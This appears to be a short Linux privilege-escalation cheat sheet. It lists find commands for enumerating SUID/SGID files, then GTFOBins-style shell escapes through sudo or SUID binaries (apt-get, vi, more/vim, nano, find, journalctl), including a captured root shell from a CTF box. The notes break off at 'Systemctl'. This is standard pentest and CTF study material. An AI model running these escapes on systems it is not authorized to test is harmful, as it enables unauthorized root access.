
SUID/SGID

# Inventory every regular file on the system that carries the setuid bit
# (-perm -4000 is the numeric form of -u=s); permission-denied noise is dropped.
find / -type f -perm -4000 2>/dev/null

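# Find files with SUID configured
# Test the setuid bit itself (-perm -4000) instead of the exact mode 4755: an
# exact-mode match silently misses setuid binaries with other modes (4555, 4711, ...).
# Restrict to regular files and discard permission-denied errors from the scan.
find / -type f -perm -4000 2>/dev/null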

# Find all the SUID/SGID executables
# A regular file qualifies when either bit is set (-perm -4000 is u+s, -perm -2000
# is g+s); each match is listed in long form so owner and mode are visible.
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2> /dev/null

Enum SUID / SGID - Find

# Exact-mode match: reports only files whose mode is precisely 0777, not every
# world-writable file (that would be -perm -o+w).
find /etc -perm 777
# Files owned by one account; "username" is a placeholder for the account under review.
find / -user username

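# Find files with SUID configured
# Match on the setuid bit (-perm -4000) rather than the exact mode 4755, which
# overlooks setuid binaries with any other permission combination.
find /usr/bin -type f -perm -4000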

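# Find files with SGID configured
# Match on the setgid bit (-perm -2000) rather than the exact mode 2755, which
# overlooks setgid binaries with any other permission combination.
find /usr/bin -type f -perm -2000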

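# Find files with the Sticky Bit configured
# "-perm /1444" matches anything with the sticky bit OR any read bit set, i.e.
# nearly every readable entry under /etc; "-perm -1000" requires the sticky bit.
find /etc -perm -1000 2>/dev/null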

Setuid

The setuid bit appears as an s.

# Long-list every root-owned setuid entry (-d: show directories themselves rather
# than their contents, -b: escape non-printing characters in names); unreadable
# paths are silenced.
find / -perm -4000 -user root -exec ls -ldb '{}' \; 2>/dev/null

Setgid

# NOTE: -perm -6000 requires BOTH the setuid and setgid bits, as in the sample
# output below (-rwsr-sr-x); to match setgid alone use -perm -2000.
find / -uid 0 -perm -6000 -type f 2>/dev/null
# Same selection, long-listed with ls (-d: list the entry itself, -b: escape
# non-printing characters in names).
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine

GTFOBins

apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)

Vi

sudo vi
:!sh

More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

Dans vim
:set shell=/bin/sh
:shell

Nano

./nano
^R^X
reset; sh 1>&0 2>&0

Find

find . -exec /bin/sh -p \; -quit`

Journalctl

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls

Systemctl

Tool
